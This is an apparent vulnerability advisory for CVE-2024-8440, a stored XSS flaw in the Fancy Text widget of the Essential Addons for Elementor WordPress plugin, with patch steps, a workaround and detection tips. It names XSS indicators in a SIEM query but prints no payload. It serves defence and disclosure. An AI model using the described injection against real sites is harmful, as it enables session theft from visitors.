CVE-2024-8440
📋 TL;DR
This stored XSS vulnerability in Essential Addons for Elementor plugin allows authenticated attackers with contributor-level access or higher to inject malicious scripts via the Fancy Text widget. The scripts execute when users view affected pages, potentially compromising visitor sessions. All WordPress sites using this plugin up to version 6.0.3 are affected.
💻 Affected Systems
- Essential Addons for Elementor Lite
- Essential Addons for Elementor Pro
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal admin credentials, redirect users to malicious sites, deface websites, or install backdoors leading to complete site compromise.
Likely Case
Session hijacking, cookie theft, or defacement of public-facing pages through injected malicious scripts.
If Mitigated
With proper user role management and content review, impact limited to isolated page defacement.
🎯 Exploit Status
Exploitation requires authenticated access but is straightforward once authenticated.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.0.4
Vendor Advisory: https://wordpress.org/plugins/essential-addons-for-elementor-lite/#developers
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find Essential Addons for Elementor. 4. Click 'Update Now' if available, or manually update to version 6.0.4+. 5. Clear any caching plugins/CDN caches.
🔧 Temporary Workarounds
Disable Fancy Text Widget
allTemporarily disable the vulnerable widget until patched
Add to theme's functions.php: add_filter('elementor/widgets/register', function($widgets_manager) { $widgets_manager->unregister_widget_type('eael-fancy-text'); });
Restrict User Roles
allLimit contributor-level access to trusted users only
🧯 If You Can't Patch
- Review and audit all content created by contributor-level users for suspicious scripts
- Implement Content Security Policy (CSP) headers to restrict script execution sources
🔍 How to Verify
Check if Vulnerable:
Check plugin version in WordPress admin > Plugins > Essential Addons for Elementor. If version is 6.0.3 or lower, you are vulnerable.Check Version:
wp plugin list --name='essential-addons-for-elementor' --field=versionVerify Fix Applied:
Confirm plugin version is 6.0.4 or higher. Test Fancy Text widget with script payloads to ensure they are properly sanitized.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to elementor/ajax endpoints
- Multiple page edits by contributor users in short time
Network Indicators:
- External script loads from unexpected domains in page responses
SIEM Query:
source="wordpress.log" AND "eael-fancy-text" AND ("script" OR "onerror" OR "javascript:")🔗 References
- https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Elements/Fancy_Text.php#L114
- https://plugins.trac.wordpress.org/changeset/3148624/
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/#developers
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c5960396-5320-4978-aa82-2e33700daa43?source=cve
